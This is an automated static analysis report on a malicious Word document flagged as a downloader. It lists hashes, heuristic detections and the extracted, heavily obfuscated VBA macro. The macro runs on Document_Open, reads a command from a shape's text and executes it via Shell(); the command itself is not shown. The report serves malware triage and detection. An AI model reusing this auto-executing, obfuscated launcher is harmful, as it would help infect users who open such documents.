Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72a85880fe96b7c8…

MALICIOUS

Office (OLE)

Size: 85.4 KB | Created: 2018-11-13 21:39:00 | Authoring application: Microsoft Office Word | First seen: 2020-02-04
MD5: d8e5af1547f6cade9f8c294766e129b6 SHA-1: 5f0be4f9f413ace4c1dc7173e3584dc708c96fc2 SHA-256: 72a85880fe96b7c8fe236d4c6cb288a34d48d5b64996905cbed56b2f647c49e6
Risk Score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Valyria-6769640-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6769640-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
        End If
    iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI)
       If (wEMNuff <> 0 Or vKHrGfLtQ) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_open()
       If (auIRQQ <> 0 Or aOWazKfw) Then
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
| --- | --- | --- | --- |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7694 bytes |
SHA-256: 7bf97758d6844cc4086324a2982b7b41f0fd337e7bb2d3f3a8ec5b33ff1be7fc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
83 of 154 identifiers look randomly generated (e.g. 'IMuCUMWmGC'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IMuCUMWmGC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lwZCufGCP()
Const oXvSNWdI = 224789120 - 224789120
   If (fHTtZ <> 0 Or vmRlIsaSH) Then
        vmRlIsaSH = True
        SSGLDOmUz = SSGLDOmUz & YGAKCB = 467282665 * 347386948
        If (fHTtZ = 1) Then
            SSGLDOmUz = SSGLDOmUz & FcNcin = Vlvwu - 325908429
            SSGLDOmUz = SSGLDOmUz & JPiGC = GKwRU / wpYpmH
            SSGLDOmUz = SSGLDOmUz & GzVptR = 126208497 / 45039723
        Else
            SSGLDOmUz = SSGLDOmUz & irqSSp = 235024981 - paJbtH
            SSGLDOmUz = SSGLDOmUz & ujGLti = 137534374 - zqfwoN
            SSGLDOmUz = SSGLDOmUz & KoZkoS = PUjwiY - 120808974
        End If
    End If
   If (GpYVq <> 0 Or vuAprmnw) Then
        vuAprmnw = True
        TdsQiTrs = TdsQiTrs & BiUshq = 284512062 - 29939391
        If (GpYVq = 1) Then
            TdsQiTrs = TdsQiTrs & SaUpZc = nkfok + 533672341
            TdsQiTrs = TdsQiTrs & wJnPF = ujvQlO * lTHRDM
            TdsQiTrs = TdsQiTrs & vZLTI = rPEjw + GcqsuE
        Else
            TdsQiTrs = TdsQiTrs & owNXKi = 283011076 / cqufTc
            TdsQiTrs = TdsQiTrs & bUXwUG = BfbORH + VvbNM
            TdsQiTrs = TdsQiTrs & YMiCA = 232234157 * hlBVZN
        End If
    End If
mqlsPI = Shapes(NszoLN + AnwhAKT + 1 + milkrFp + PaNOGfh).TextFrame.ContainingRange + FoYcwZ + BTvOJMT
   If (ciiWnKWj <> 0 Or nQlhTzZrN) Then
        nQlhTzZrN = True
        DJhLpGDVW = DJhLpGDVW & FOuLU = 529027297 / DwwSi
        If (ciiWnKWj = 1) Then
            DJhLpGDVW = DJhLpGDVW & wwmiz = AvpSw / 403899955
            DJhLpGDVW = DJhLpGDVW & zcuSpQ = 462622714 + 416953551
            DJhLpGDVW = DJhLpGDVW & oAPsZW = 274086552 / MQwdv
        Else
            DJhLpGDVW = DJhLpGDVW & MBMjZL = jVabn / 100433503
            DJhLpGDVW = DJhLpGDVW & RMrIl = 520799977 / 4277701
            DJhLpGDVW = DJhLpGDVW & fipBh = 109187285 * 524512413
        End If
    End If
iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI)
   If (wEMNuff <> 0 Or vKHrGfLtQ) Then
        vKHrGfLtQ = True
        ZEvzzCJ = ZEvzzCJ & wWuBMo = 136441263 + 333651452
        If (wEMNuff = 1) Then
            ZEvzzCJ = ZEvzzCJ & FAaNr = 282855970 - cuCaWH
            ZEvzzCJ = ZEvzzCJ & EiGdtU = kawHJ * PjIEt
            ZEvzzCJ = ZEvzzCJ & SnAikj = twJtZ + vZaNQR
        Else
            ZEvzzCJ = ZEvzzCJ & rPTiC = DnPtm / jXowDD
            ZEvzzCJ = ZEvzzCJ & wUaca = 517687982 * YfOdpV
            ZEvzzCJ = ZEvzzCJ & nlHDTV = 211598828 + 315062024
        End If
    End If
   If (zSZoF <> 0 Or FNVIK) Then
        FNVIK = True
        PMWzfdM = PMWzfdM & iclbP = 399999250 * 395708406
        If (zSZoF = 1) Then
            PMWzfdM = PMWzfdM & MAPbw = dXiWcs / 43176053
            PMWzfdM = PMWzfdM & DCMlb = pGquzk - 162331629
            PMWzfdM = PMWzfdM & jaaWhw = nzEzt * 154383572
        Else
            PMWzfdM = PMWzfdM & Sssiz = mcJBV - JmZLVG
            PMWzfdM = PMWzfdM & qOMDw = 388283978 - piTMF
            PMWzfdM = PMWzfdM & OsQWwN = uawGW * 325567165
        End If
    End If
   If (jXMzc <> 0 Or wfCwGpw) Then
        wfCwGpw = True
        KtTPDD = KtTPDD & wtQdz = 271725045 / 83614485
        If (jXMzc = 1) Then
            KtTPDD = KtTPDD & MrsIp = 306560923 / rfSSUk
            KtTPDD = KtTPDD & zipTPG = 471489280 - 386022285
            KtTPDD = KtTPDD & ujhiq = Uzhdw / 150380567
        Else
            KtTPDD = KtTPDD & fSmoJ = 326048488 + 314223035
            KtTPDD = KtTPDD & RLFmsb = fZEYIZ + WhPcK
            KtTPDD = KtTPDD & RWJtw = 379478191 * 519240723
        End If
    End If
   If (cliDXv <> 0 Or DGcWKvUoQ) Then
        DGcWKvUoQ = True
        twdnpJZX = twdnpJZX & KvQlch = EUiwZD + 325012030
        If (cliDXv = 1) Then
            twdnpJZX = twdnpJZX & jbIASL = 243762865 + 97847169
            twdnpJZX = twdnpJZX & TzqQaX = dnbFfc * znUApj
            twdnpJZX = twdnpJZX & zFUNqN = LhIGLw - zaVCJc
        Else
            twdnpJZX = twdnpJZX & hHqtaA = onAdbF - 218359720
            twdnpJZX = twdnpJZX & sVDkK = 480985890 * 271183468
            twdnpJZX = twdnpJZX & RGSwU = 450873287 - tzMzwf
        End If
    End If
End Function
Private Sub Document_open()
   If (auIRQQ <> 0 Or aOWazKfw) Then
        aOWazKfw = True
        cEUajiz = cEUajiz & qnAEMF = 327800203 * ocbWLV
        If (auIRQQ = 1) Then
            cEUajiz = cEUajiz & AjWpMa = GULAJY * jGhwu
            cEUajiz = cEUajiz & acPdN = llXjJ + 519343112
            cEUajiz = cEUajiz & ApDoEu = 515032081 - 312413582
        Else
            cEUajiz = cEUajiz & YtkTp = CjdFV * 296778186
            cEUajiz = cEUajiz & ZRAMXQ = bDoIik + QIjEu
            cEUajiz = cEUajiz & mfVcq = 366197253 / 218370920
        End If
    End If
   If (wfFNYlSk <> 0 Or HzijLFBww) Then
        HzijLFBww = True
        UTjAOwL = UTjAOwL & KBZnd = 319061158 + XIdwv
        If (wfFNYlSk = 1) Then
            UTjAOwL = UTjAOwL & BDohv = 200065476 - 491863933
            UTjAOwL = UTjAOwL & oPiTz = hhVNQf / RNjHjS
            UTjAOwL = UTjAOwL & TTJDc = 456738904 / 535880450
        Else
            UTjAOwL = UTjAOwL & BjVRf = EzIwTr - sGwtJ
            UTjAOwL = UTjAOwL & zGiERw = 396145209 + 182634095
            UTjAOwL = UTjAOwL & PazUF = 473031451 + qzjALE
        End If
    End If
   If (zdTPNO <> 0 Or tIcksYF) Then
        tIcksYF = True
        SSzbI = SSzbI & osZvGj = oCwUoA - rjUznu
        If (zdTPNO = 1) Then
            SSzbI = SSzbI & KVjlU = HjfjjI + IltTGi
            SSzbI = SSzbI & EFiPEX = MizBn - 267123905
            SSzbI = SSzbI & NiWpK = 45991252 / pTHWRo
        Else
            SSzbI = SSzbI & ImGqAq = zIEqU / 309682322
            SSzbI = SSzbI & wjvwii = 125639746 - 364226225
            SSzbI = SSzbI & uidODJ = 434525500 / 4375307
        End If
    End If
   If (bwjNbYPY <> 0 Or szKiO) Then
        szKiO = True
        ajVco = ajVco & YJomv = 410176811 + 224657245
        If (bwjNbYPY = 1) Then
            ajVco = ajVco & iIrmqW = YMUdt * 475746604
            ajVco = ajVco & hKoGk = 457674572 - 463280713
            ajVco = ajVco & NjZDi = 396580154 + 56394190
        Else
            ajVco = ajVco & hfhCnv = 443827369 - fmlQOF
            ajVco = ajVco & oJqsG = cTHvk + DShEE
            ajVco = ajVco & IEJqn = YZCOW * uZBifE
        End If
    End If
lwZCufGCP
   If (LcIjCpj <> 0 Or AcfYLT) Then
        AcfYLT = True
        jkBinn = jkBinn & wZKSHu = 80734416 + 355806204
        If (LcIjCpj = 1) Then
            jkBinn = jkBinn & XWOpTQ = jcjvSz + HYWrT
            jkBinn = jkBinn & lsobn = QfjWjh / 15906184
            jkBinn = jkBinn & XcGRjr = 159107910 * nDIVm
        Else
            jkBinn = jkBinn & pmpAo = odJfhn * 113519003
            jkBinn = jkBinn & jzvzG = 529810725 + NcZiAH
            jkBinn = jkBinn & zPdijS = Szipih + sLOzY
        End If
    End If
   If (LDsGCYYs <> 0 Or HptBbZ) Then
        HptBbZ = True
        bvOwj = bvOwj & VFOYoV = LhbdF * LkchuP
        If (LDsGCYYs = 1) Then
            bvOwj = bvOwj & hWApjj = KnBJi + 303723400
            bvOwj = bvOwj & cinrdj = 182673655 / aEaNP
            bvOwj = bvOwj & nNQwNU = JBwEZs / BGYjS
        Else
            bvOwj = bvOwj & HLdzlE = Lzcwn + jtGuo
            bvOwj = bvOwj & ovoaji = lbCTj * vQobkT
            bvOwj = bvOwj & JKYJZ = RAIOv - 270124549
        End If
    End If
End Sub